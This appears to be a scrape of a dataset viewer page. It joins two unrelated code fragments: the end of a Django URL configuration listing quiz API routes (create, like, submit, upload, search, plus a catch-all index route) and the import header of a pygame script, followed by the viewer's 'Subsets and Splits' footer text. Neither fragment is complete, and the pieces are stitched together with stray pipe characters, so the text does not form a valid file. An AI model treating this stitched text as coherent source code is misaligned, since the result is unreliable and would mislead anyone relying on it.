path('api/create_quiz/', views.QuizCreate.as_view()),
path('api/recent_quiz/', views.RecentQuiz.as_view()),
path('api/top_quiz/', views.TopQuiz.as_view()),
path('api/posted_quiz/', views.PostedQuiz.as_view()),
path('api/liked_quiz/', views.LikedQuiz.as_view()),
path('api/like_quiz/<int:pk>/', views.LikeQuiz.as_view()),
path('api/submit_quiz/', views.user_submit),
path('api/pending_quiz/', views.PendingQuiz.as_view()),
path('api/upfile/',views.upload_file_quiz),
path('api/search/', views.SearchQuiz.as_view()),
re_path(r'^.*$', views.index),
] |
## Standard Include Stanza
from __future__ import division
import pygame
from pygame.locals import *
import sys
import getopt
import csv
import time
import os
import random
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.